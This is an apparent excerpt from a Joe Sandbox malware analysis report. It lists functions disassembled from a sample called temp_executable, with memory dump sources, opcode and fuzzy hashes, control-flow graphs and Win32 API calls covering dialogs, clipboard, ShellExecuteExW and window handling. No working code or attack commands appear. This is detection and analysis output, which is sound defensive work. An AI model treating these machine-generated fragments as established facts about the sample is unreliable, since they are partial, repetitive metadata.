                                • Opcode ID: 5d41dd048661d45847d9dfc27270246facd75d1d2c5800aed0b09d08bd016d27
                                • Instruction ID: a4c7e49923347c6c0402871eb8996e6347fc04c3ea986e5ac50e9a1d1efdd739
                                • Opcode Fuzzy Hash: 5d41dd048661d45847d9dfc27270246facd75d1d2c5800aed0b09d08bd016d27
                                • Instruction Fuzzy Hash: 5190023135100003D64072987618646400597E2701F51D456F040C534CD925885A6332
                                Function 32D82C10 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e04c8a46327b77ac88b1a02291d8d74dea163495eb519d9dd0a3d5767a0a1087
                                • Instruction ID: e8e8cfcd685aa1de5939831325ede59950f6d014657d5201a56b69d539d1f181
                                • Opcode Fuzzy Hash: e04c8a46327b77ac88b1a02291d8d74dea163495eb519d9dd0a3d5767a0a1087
                                • Instruction Fuzzy Hash: EB90023125100403D60062987708747000547D1601F51D856B041C538DD66688557231
                                Function 32D83C30 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 78cd9126c268ab73f18b644494e26637b2f5af010485707908456f6e994cedac
                                • Instruction ID: c986193efdf5d5caa7e6ee4e4d43468a260c1d1fa5a9f0fbbee8a7b08937b3a3
                                • Opcode Fuzzy Hash: 78cd9126c268ab73f18b644494e26637b2f5af010485707908456f6e994cedac
                                • Instruction Fuzzy Hash: F0900231252001429A4063987A04A8E410547E2702B91D85AB000D534CC92488656331
                                Function 32D82C30 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f08e34fc276e06c3d92e8ab17550ad1fa807059fda60d5cfe2a4fa4b39b9d7ec
                                • Instruction ID: bb267227662f8e953d50dabcf4033b05734423ddb7beaa934983710ee1e9b4c8
                                • Opcode Fuzzy Hash: f08e34fc276e06c3d92e8ab17550ad1fa807059fda60d5cfe2a4fa4b39b9d7ec
                                • Instruction Fuzzy Hash: E190023926300002D6807298760864A000547D2602F91D85AB000D538CC925886D6331
                                Function 32D82C20 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 82e812e6a32cbbd66c0739815f383cb9ee4b352ffe800102f8b73ec307651250
                                • Instruction ID: d868652e01df2e39dbbb4a82ad0ffa78f0c5eea15832a0f7f132b1d333b26e27
                                • Opcode Fuzzy Hash: 82e812e6a32cbbd66c0739815f383cb9ee4b352ffe800102f8b73ec307651250
                                • Instruction Fuzzy Hash: F090023125504442D60066987608A46000547D1605F51D456B105C575DC6358855B231
                                Function 32D82DC0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 655df7644b530bf6acd917d99cfdf6f138f3cb4c953f03177570d6f6a88b5850
                                • Instruction ID: 73df5dcef305fb50459d3fd0268a1434636ee8d87090c1f3fdf9996e70b429f6
                                • Opcode Fuzzy Hash: 655df7644b530bf6acd917d99cfdf6f138f3cb4c953f03177570d6f6a88b5850
                                • Instruction Fuzzy Hash: CA90027125100402D64072986604786000547D1701F51C456B505C534EC6698DD97775
                                Function 32D82DA0 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f024b027ec4340c9e7cb17472021051219760e40769e06895e900e784f10d8f0
                                • Instruction ID: ef0afd056a19e63272e901a0d9f3ed76b9061d71785c93eaf762467b390cba5a
                                • Opcode Fuzzy Hash: f024b027ec4340c9e7cb17472021051219760e40769e06895e900e784f10d8f0
                                • Instruction Fuzzy Hash: 4D90023165100502D60172986604656000A47D1641F91C467B101C535ECA358996B231
                                Function 32D82D50 Relevance: .0, Instructions: 4COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e9ab6e24af41187d620c9f3fae2b726fde72ea3683f136725529d0559aa137b5
                                • Instruction ID: 490a0bff773c1bb24056aa403d1ce41cd176ada97364120016f4fd745f0630e6
                                • Opcode Fuzzy Hash: e9ab6e24af41187d620c9f3fae2b726fde72ea3683f136725529d0559aa137b5
                                • Instruction Fuzzy Hash: 7890023135100402D60262986614646000987D2745F91C457F141C535DC6358957B232
                                Function 32D82B20 Relevance: .0, Instructions: 2COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                • Instruction ID: 26a0f03a1063b9cdb77ff6a336e015bc7534de05ffb9100c5d734b6b39f9b15c
                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                • Instruction Fuzzy Hash:
                                Function 32A3E020 Relevance: 57.7, Strings: 46, Instructions: 211COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 270 32a3e020-32a3e207 271 32a3e209-32a3e214 270->271 271->271 272 32a3e216-32a3e231 271->272 273 32a3e237-32a3e250 272->273 274 32a3e2c4-32a3e2c8 272->274 275 32a3e258-32a3e2ba 273->275 276 32a3e2ea-32a3e2ee 274->276 277 32a3e2ca-32a3e2e7 274->277 275->275 278 32a3e2bc-32a3e2bd 275->278 279 32a3e311-32a3e315 276->279 280 32a3e2f0-32a3e30e 276->280 277->276 278->274 281 32a3e332-32a3e34b 279->281 282 32a3e317-32a3e32f 279->282 280->279 282->281
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223170855.0000000032A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 32A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32a30000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                • API String ID: 0-3754132690
                                • Opcode ID: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
                                • Instruction ID: c1265978254bfed71e96761dd0c275b7dbaf1cd8ff1f35ba32e250aa578a86b2
                                • Opcode Fuzzy Hash: fdc7e8973fa29a8e9ded732f7d65128a49cab7f9a4b461baca6ac5a47474afa8
                                • Instruction Fuzzy Hash: A5915DF04483988AC7158F55A1612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                Function 00404B0B Relevance: 54.3, APIs: 36, Instructions: 295windowclipboardmemoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 283 404b0b-404b22 284 404cb4-404cba 283->284 285 404b28-404bf6 GetDlgItem * 3 call 4054de call 405810 GetClientRect GetSystemMetrics SendMessageW * 2 283->285 287 404d00-404d06 284->287 288 404cbc-404ce2 GetDlgItem CreateThread CloseHandle 284->288 309 404bf8-404c0a SendMessageW * 2 285->309 310 404c0c-404c12 285->310 289 404d31-404d37 287->289 290 404d08-404d12 287->290 292 404ce8-404cf1 call 405736 288->292 294 404d39-404d40 289->294 295 404d7f-404d82 289->295 290->292 293 404d14-404d2f ShowWindow * 2 call 4054de 290->293 302 404cf6-404cfd 292->302 293->292 299 404d42-404d4c 294->299 300 404d55-404d6a ShowWindow 294->300 295->292 303 404d88-404d8c 295->303 306 404d4e-404d53 call 405933 299->306 307 404d7b-404d7d 300->307 308 404d6c-404d76 call 405d15 300->308 303->292 304 404d92-404daa SendMessageW 303->304 311 404ec0-404ec2 304->311 312 404db0-404de2 CreatePopupMenu call 405e95 AppendMenuW 304->312 306->292 307->306 308->307 309->310 315 404c14-404c1c SendMessageW 310->315 316 404c1e-404c37 call 4054f5 310->316 311->302 324 404de4-404df4 GetWindowRect 312->324 325 404df8-404e14 TrackPopupMenu 312->325 315->316 322 404c39-404c4d ShowWindow 316->322 323 404c6b-404c91 GetDlgItem SendMessageW 316->323 326 404c5a 322->326 327 404c4f-404c58 ShowWindow 322->327 323->311 329 404c97-404caf SendMessageW * 2 323->329 324->325 325->311 328 404e1a-404e26 325->328 330 404c60-404c66 call 4054de 326->330 327->330 331 404e2e-404e48 SendMessageW 328->331 329->311 330->323 331->331 333 404e4a-404e74 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 331->333 334 404e76-404ea2 SendMessageW 333->334 334->334 335 404ea4-404eba GlobalUnlock SetClipboardData CloseClipboard 334->335 335->311
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 00404B6C
                                • GetDlgItem.USER32(?,000003EE), ref: 00404B7C
                                • GetClientRect.USER32(00000000,?), ref: 00404BB9
                                • GetSystemMetrics.USER32(00000002), ref: 00404BC1
                                • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404BE3
                                • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404BF2
                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C00
                                • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C0A
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(00427CA0,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,?,?,?,?,00000000,?,?), ref: 0040604B
                                • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C1C
                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C40
                                • ShowWindow.USER32(00000000,00000008), ref: 00404C52
                                • GetDlgItem.USER32(?,000003EC), ref: 00404C74
                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404C88
                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CA3
                                • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CAD
                                • ShowWindow.USER32(00000000), ref: 00404D22
                                • ShowWindow.USER32(?,00000008), ref: 00404D27
                                • GetDlgItem.USER32(?,000003F8), ref: 00404B8C
                                  • Part of subcall function 004054DE: SendMessageW.USER32(00000028,?,00000001,00405313), ref: 004054EC
                                • GetDlgItem.USER32(?,000003EC), ref: 00404CCD
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000583F,00000000), ref: 00404CDB
                                • CloseHandle.KERNEL32(00000000), ref: 00404CE2
                                • ShowWindow.USER32(00000008), ref: 00404D5D
                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404D9C
                                • CreatePopupMenu.USER32 ref: 00404DB0
                                • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DCC
                                • GetWindowRect.USER32(?,?), ref: 00404DEA
                                • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E0C
                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404E3B
                                • OpenClipboard.USER32(00000000), ref: 00404E4B
                                • EmptyClipboard.USER32 ref: 00404E51
                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E5D
                                • GlobalLock.KERNEL32(00000000), ref: 00404E6A
                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00404E86
                                • GlobalUnlock.KERNEL32(?), ref: 00404EA9
                                • SetClipboardData.USER32(0000000D,?), ref: 00404EB4
                                • CloseClipboard.USER32 ref: 00404EBA
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                • String ID:
                                • API String ID: 2901622961-0
                                • Opcode ID: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                • Instruction ID: 6359324f75213449b6abc0588f6453f91f7fc730003d35bba9c6bb800d03804c
                                • Opcode Fuzzy Hash: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                • Instruction Fuzzy Hash: BEA1C5B1205704BBD320AB25DD49F5B7FADFF88750F01493EF681A62A1CB788841CB69
                                Function 00404F6D Relevance: 52.9, APIs: 35, Instructions: 374windowstringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 336 404f6d-404f86 337 404f8c-404f92 336->337 338 40510e-405120 336->338 337->338 341 404f98-404f9b 337->341 339 405122-405162 GetDlgItem * 2 call 4054f5 SetClassLongW call 401533 338->339 340 405168-40517c 338->340 339->340 343 4051ba-4051bf call 4054c3 340->343 344 40517e-405180 340->344 345 404fb7-404fba 341->345 346 404f9d-404fb2 SetWindowPos 341->346 360 4051c4-4051e3 343->360 348 4051b2-4051b4 344->348 349 405182-40518d call 401399 344->349 352 40500a-405010 345->352 353 404fbc-404fdb ShowWindow 345->353 350 4050fa 346->350 348->343 358 405485 348->358 349->348 377 40518f-4051ad SendMessageW 349->377 359 4050fe-405109 call 405736 350->359 354 405012-405027 DestroyWindow 352->354 355 40502c-40502f 352->355 353->359 361 404fe1-404ff7 GetWindowLongW 353->361 365 405469-405470 354->365 366 405031-40503f SetWindowLongW 355->366 367 405044-40504a 355->367 369 405487-40548e 358->369 359->369 362 4051e5-4051f0 call 401533 360->362 363 4051f6-4051fc 360->363 361->359 364 404ffd-405005 ShowWindow 361->364 362->363 374 405202-405204 363->374 375 405445-40545e DestroyWindow EndDialog 363->375 364->359 365->358 373 405472-405474 365->373 366->369 367->350 376 405050-40506a GetDlgItem 367->376 373->358 381 405476-40547f ShowWindow 373->381 374->375 382 40520a-405261 call 405e95 call 4054f5 * 3 GetDlgItem 374->382 379 405464 375->379 383 40506c-405085 SendMessageW IsWindowEnabled 376->383 384 40508f-405094 376->384 377->369 379->365 381->358 412 405263-40526b 382->412 413 40526f-4052be ShowWindow EnableWindow * 3 382->413 383->358 386 40508b 383->386 387 405096-405097 384->387 388 405099-40509c 384->388 386->384 390 4050da-4050df call 405933 387->390 391 4050ab-4050ae 388->391 392 40509e-4050a5 388->392 390->359 395 4050e1-4050f4 SendMessageW 391->395 397 4050b0-4050b7 391->397 392->395 396 4050a7-4050a9 392->396 395->350 396->390 398 4050c7-4050d0 call 401533 397->398 399 4050b9-4050c5 call 401533 397->399 398->359 409 4050d2 398->409 408 4050d8 399->408 408->390 409->408 412->413 414 4052c0-4052c1 413->414 415 4052c3 413->415 416 4052c4-4052ef GetSystemMenu EnableMenuItem SendMessageW 414->416 415->416 417 4052f1-405306 SendMessageW 416->417 418 405308 416->418 419 40530e-405354 call 4054de call 405cf6 call 406af5 lstrlenW call 405e95 SetWindowTextW call 401399 417->419 418->419 419->360 430 40535a-40535c 419->430 430->360 431 405362-405366 430->431 432 405385-405399 DestroyWindow 431->432 433 405368-40536e 431->433 432->379 435 40539f-4053cc CreateDialogParamW 432->435 433->358 434 405374-40537a 433->434 434->360 436 405380 434->436 435->365 437 4053d2-405429 call 4054f5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 435->437 436->358 437->358 442 40542b-405443 ShowWindow call 4054c3 437->442 442->379
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAC
                                • ShowWindow.USER32(?), ref: 00404FD6
                                • GetWindowLongW.USER32(?,000000F0), ref: 00404FE7
                                • ShowWindow.USER32(?,00000004), ref: 00405003
                                • GetDlgItem.USER32(?,00000001), ref: 0040512A
                                • GetDlgItem.USER32(?,00000002), ref: 00405134
                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040514E
                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519C
                                • GetDlgItem.USER32(?,00000003), ref: 0040524B
                                • ShowWindow.USER32(00000000,?), ref: 00405274
                                • EnableWindow.USER32(?,?), ref: 00405288
                                • EnableWindow.USER32(?), ref: 0040529C
                                • EnableWindow.USER32(?), ref: 004052B4
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CB
                                • EnableMenuItem.USER32(00000000), ref: 004052D2
                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E3
                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FA
                                • lstrlenW.KERNEL32(004211D0,?,004211D0,00000000), ref: 0040532B
                                  • Part of subcall function 00405E95: lstrcatW.KERNEL32(00427CA0,\Microsoft\Internet Explorer\Quick Launch,?,?,00424200,?,?,?,?,?,00000000,?,?), ref: 0040604B
                                • SetWindowTextW.USER32(?,004211D0), ref: 00405343
                                  • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                  • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                • DestroyWindow.USER32(?,00000000), ref: 0040538B
                                • CreateDialogParamW.USER32(?,?,FFBD62DF), ref: 004053BF
                                  • Part of subcall function 004054F5: SetDlgItemTextW.USER32(?,?,00000000), ref: 0040550F
                                • GetDlgItem.USER32(?,000003FA), ref: 004053E8
                                • GetWindowRect.USER32(00000000), ref: 004053EF
                                • ScreenToClient.USER32(?,?), ref: 004053FB
                                • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405414
                                • ShowWindow.USER32(00000008,?,00000000), ref: 00405433
                                  • Part of subcall function 004054C3: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D5
                                • ShowWindow.USER32(?,0000000A), ref: 00405479
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSendShow$Enable$LongMenuText$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                • String ID:
                                • API String ID: 3304020681-0
                                • Opcode ID: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                • Instruction ID: 1b19c71cd4f81cfbd26a1cf5418529817e88c436646d4b9e8708edd60e3e664c
                                • Opcode Fuzzy Hash: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                • Instruction Fuzzy Hash: C4D1C070601A11AFDB206F21ED48A6B7BA8FB48355F40453EF945B21F0CB399852DFAD
                                Function 00403D65 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 221windowstringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 445 403d65-403d74 446 403d7a-403d83 445->446 447 403e9f-403eab 445->447 450 403d85-403d94 446->450 451 403d96-403e45 call 4054f5 * 2 CheckDlgButton EnableWindow GetDlgItem call 4054de SendMessageW 446->451 448 403f20-403f25 447->448 449 403ead-403eb7 447->449 454 404038-404040 448->454 455 403f2b-403f47 GetDlgItem 448->455 452 404048-404051 call 405736 449->452 453 403ebd-403ec4 449->453 450->451 481 403e50-403e9a SendMessageW * 2 lstrlenW SendMessageW * 2 451->481 482 403e47-403e4a GetSysColor 451->482 464 404056-40405d 452->464 453->452 457 403eca-403ed4 453->457 454->452 458 404042 454->458 460 403f4d-403f54 455->460 461 403fee-403ff4 455->461 457->452 463 403eda-403f1b GetDlgItem SendMessageW EnableWindow call 405517 457->463 458->452 460->452 465 403f5a-403f77 460->465 461->452 467 403ff6-403ffd 461->467 463->452 465->452 469 403f7d-403feb SendMessageW LoadCursorW SetCursor call 4069ce LoadCursorW SetCursor 465->469 467->452 471 403fff-404005 467->471 469->461 472 404007-40401b SendMessageW 471->472 473 40401e-404021 471->473 472->473 477 404033-404036 473->477 478 404023-40402d SendMessageW 473->478 477->464 478->477 481->464 482->481
                                APIs
                                • CheckDlgButton.USER32(?,?,00000001), ref: 00403E04
                                • EnableWindow.USER32(?), ref: 00403E11
                                • GetDlgItem.USER32(?,000003E8), ref: 00403E1D
                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403E39
                                • GetSysColor.USER32(?), ref: 00403E4A
                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403E58
                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403E66
                                • lstrlenW.KERNEL32(?), ref: 00403E6C
                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403E79
                                • SendMessageW.USER32(00000000,00000449,?,?), ref: 00403E90
                                • GetDlgItem.USER32(?,0000040A), ref: 00403EEC
                                • SendMessageW.USER32(00000000), ref: 00403EF3
                                • EnableWindow.USER32(00000000), ref: 00403F10
                                • GetDlgItem.USER32(0000004E,000003E8), ref: 00403F34
                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403F89
                                • LoadCursorW.USER32(00000000,00007F02), ref: 00403F9B
                                • SetCursor.USER32(00000000), ref: 00403FA4
                                  • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00403FE6
                                • SetCursor.USER32(00000000), ref: 00403FE9
                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404015
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040402D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                • String ID: N
                                • API String ID: 3270077613-1130791706
                                • Opcode ID: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                • Instruction ID: 4fa98256382c23a77b640614663c001b7206c978ba46bfa2c34382a940cfe240
                                • Opcode Fuzzy Hash: 9fe76440a7bbb49420d9e25e1a97e0c0d372ca4686a6a0a345b6597793e48a1e
                                • Instruction Fuzzy Hash: A881B0B1604308AFD710AF24DD44A6B7BE9FF88345F41083EF641A72A1CB789945CF59
                                Function 00405A19 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 225stringregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 576 405a19-405a34 call 4068c1 579 405a36-405a46 call 4065fa 576->579 580 405a48-405a7e call 406952 576->580 588 405aa1-405aca call 40595a call 406613 579->588 584 405a80-405a91 call 406952 580->584 585 405a96-405a9c lstrcatW 580->585 584->585 585->588 594 405ad0-405ad5 588->594 595 405b62-405b6a call 406613 588->595 594->595 596 405adb-405b04 call 406952 594->596 600 405b78-405ba6 LoadImageW 595->600 601 405b6c-405b73 call 405e95 595->601 596->595 606 405b06-405b0c 596->606 604 405c25-405c2d call 401533 600->604 605 405ba8-405bd3 RegisterClassW 600->605 601->600 619 405c33-405c3e call 40595a 604->619 620 405cdf-405ce1 604->620 609 405bd5-405bd7 605->609 610 405bdc-405c20 SystemParametersInfoW CreateWindowExW 605->610 607 405b0e-405b1c call 4065d1 606->607 608 405b1f-405b2d lstrlenW 606->608 607->608 613 405b55-405b5d call 406531 call 406af5 608->613 614 405b2f-405b3d lstrcmpiW 608->614 615 405ce2-405ce9 609->615 610->604 613->595 614->613 618 405b3f-405b49 GetFileAttributesW 614->618 622 405b4b-405b4d 618->622 623 405b4f-405b50 call 406ceb 618->623 629 405c44-405c5e ShowWindow call 406179 619->629 630 405cc6-405cce call 40583f 619->630 620->615 622->613 622->623 623->613 637 405c60-405c65 call 406179 629->637 638 405c6a-405c7b GetClassInfoW 629->638 635 405cd0-405cd6 630->635 636 405cea-405cec call 401533 630->636 635->620 643 405cd8-405cda call 401533 635->643 644 405cf1 636->644 637->638 641 405c93-405cc4 DialogBoxParamW call 401533 call 403cd3 638->641 642 405c7d-405c91 GetClassInfoW RegisterClassW 638->642 641->615 642->641 643->620 644->644
                                APIs
                                  • Part of subcall function 004068C1: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
